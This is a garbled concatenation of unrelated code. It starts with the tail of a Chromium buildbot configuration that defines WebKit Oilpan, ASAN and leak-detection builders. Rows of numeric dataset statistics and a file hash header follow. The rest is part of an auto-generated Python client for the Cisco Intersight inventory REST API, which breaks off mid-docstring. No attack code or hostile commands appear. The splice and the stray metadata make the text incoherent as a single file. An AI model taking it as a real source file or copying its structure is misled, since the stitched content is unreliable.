'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/OilpanExpectations',
]),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac non-Oilpan (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 64,
},
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/OilpanExpectations',
]),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux non-Oilpan Builder': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'builder',
'compile_targets': [
'blink_tests',
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux non-Oilpan': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Linux non-Oilpan Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/OilpanExpectations',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux non-Oilpan ASAN': {
'chromium_config': 'chromium_clang',
'chromium_apply_config': ['asan', 'mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/ASANExpectations',
# ASAN is roughly 8x slower than Release.
'--time-out-ms', '48000',
'--options=--enable-sanitizer',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux Leak': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/LeakExpectations',
'--options=--enable-leak-detection',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux non-Oilpan Leak': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/OilpanExpectations',
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/LeakExpectations',
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/OilpanLeakExpectations',
'--options=--enable-leak-detection',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux non-Oilpan (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/OilpanExpectations',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
})
| 26.490196
| 75
| 0.590282
| 2,217
| 22,967
| 5.802887
| 0.082544
| 0.059852
| 0.04897
| 0.060785
| 0.93012
| 0.924446
| 0.921726
| 0.914341
| 0.906646
| 0.905946
| 0
| 0.007323
| 0.244917
| 22,967
| 866
| 76
| 26.520785
| 0.734517
| 0.053555
| 0
| 0.803103
| 0
| 0
| 0.496984
| 0.125627
| 0
| 0
| 0
| 0.001155
| 0
| 1
| 0
| false
| 0
| 0.00358
| 0
| 0.00358
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90d63e12f47d0704a8bb3f2147e42f2967dc2c51
| 95,425
|
py
|
Python
|
intersight/api/inventory_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 5
|
2021-12-16T15:13:32.000Z
|
2022-03-29T16:09:54.000Z
|
intersight/api/inventory_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 4
|
2022-01-25T19:05:51.000Z
|
2022-03-29T20:18:37.000Z
|
intersight/api/inventory_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 2
|
2020-07-07T15:01:08.000Z
|
2022-01-31T04:27:35.000Z
|
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. # noqa: E501
The version of the OpenAPI document: 1.0.9-4950
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from intersight.api_client import ApiClient, Endpoint as _Endpoint
from intersight.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from intersight.model.error import Error
from intersight.model.inventory_device_info import InventoryDeviceInfo
from intersight.model.inventory_device_info_response import InventoryDeviceInfoResponse
from intersight.model.inventory_dn_mo_binding import InventoryDnMoBinding
from intersight.model.inventory_dn_mo_binding_response import InventoryDnMoBindingResponse
from intersight.model.inventory_generic_inventory import InventoryGenericInventory
from intersight.model.inventory_generic_inventory_holder import InventoryGenericInventoryHolder
from intersight.model.inventory_generic_inventory_holder_response import InventoryGenericInventoryHolderResponse
from intersight.model.inventory_generic_inventory_response import InventoryGenericInventoryResponse
from intersight.model.inventory_request import InventoryRequest
class InventoryApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __create_inventory_request(
self,
inventory_request,
**kwargs
):
"""Create a 'inventory.Request' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_inventory_request(inventory_request, async_req=True)
>>> result = thread.get()
Args:
inventory_request (InventoryRequest): The 'inventory.Request' resource to create.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
if_none_match (str): For methods that apply server-side changes, If-None-Match used with the * value can be used to create a resource not known to exist, guaranteeing that another resource creation didn't happen before, losing the data of the previous put. The request will be processed only if the eventually existing resource's ETag doesn't match any of the values listed. Otherwise, the status code 412 (Precondition Failed) is used. The asterisk is a special value representing any resource. It is only useful when creating a resource, usually with PUT, to check if another resource with the identity has already been created before. The comparison with the stored ETag uses the weak comparison algorithm, meaning two resources are considered identical if the content is equivalent - they don't have to be identical byte for byte.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryRequest
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['inventory_request'] = \
inventory_request
return self.call_with_http_info(**kwargs)
self.create_inventory_request = _Endpoint(
settings={
'response_type': (InventoryRequest,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/Requests',
'operation_id': 'create_inventory_request',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'inventory_request',
'if_match',
'if_none_match',
],
'required': [
'inventory_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'inventory_request':
(InventoryRequest,),
'if_match':
(str,),
'if_none_match':
(str,),
},
'attribute_map': {
'if_match': 'If-Match',
'if_none_match': 'If-None-Match',
},
'location_map': {
'inventory_request': 'body',
'if_match': 'header',
'if_none_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__create_inventory_request
)
def __get_inventory_device_info_by_moid(
self,
moid,
**kwargs
):
"""Read a 'inventory.DeviceInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_inventory_device_info_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryDeviceInfo
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_inventory_device_info_by_moid = _Endpoint(
settings={
'response_type': (InventoryDeviceInfo,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/DeviceInfos/{Moid}',
'operation_id': 'get_inventory_device_info_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_inventory_device_info_by_moid
)
def __get_inventory_device_info_list(
self,
**kwargs
):
"""Read a 'inventory.DeviceInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_inventory_device_info_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryDeviceInfoResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_inventory_device_info_list = _Endpoint(
settings={
'response_type': (InventoryDeviceInfoResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/DeviceInfos',
'operation_id': 'get_inventory_device_info_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_inventory_device_info_list
)
def __get_inventory_dn_mo_binding_by_moid(
self,
moid,
**kwargs
):
"""Read a 'inventory.DnMoBinding' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_inventory_dn_mo_binding_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryDnMoBinding
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_inventory_dn_mo_binding_by_moid = _Endpoint(
settings={
'response_type': (InventoryDnMoBinding,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/DnMoBindings/{Moid}',
'operation_id': 'get_inventory_dn_mo_binding_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_inventory_dn_mo_binding_by_moid
)
def __get_inventory_dn_mo_binding_list(
self,
**kwargs
):
"""Read a 'inventory.DnMoBinding' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_inventory_dn_mo_binding_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryDnMoBindingResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_inventory_dn_mo_binding_list = _Endpoint(
settings={
'response_type': (InventoryDnMoBindingResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/DnMoBindings',
'operation_id': 'get_inventory_dn_mo_binding_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_inventory_dn_mo_binding_list
)
def __get_inventory_generic_inventory_by_moid(
self,
moid,
**kwargs
):
"""Read a 'inventory.GenericInventory' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_inventory_generic_inventory_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryGenericInventory
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_inventory_generic_inventory_by_moid = _Endpoint(
settings={
'response_type': (InventoryGenericInventory,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/GenericInventories/{Moid}',
'operation_id': 'get_inventory_generic_inventory_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_inventory_generic_inventory_by_moid
)
def __get_inventory_generic_inventory_holder_by_moid(
self,
moid,
**kwargs
):
"""Read a 'inventory.GenericInventoryHolder' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_inventory_generic_inventory_holder_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
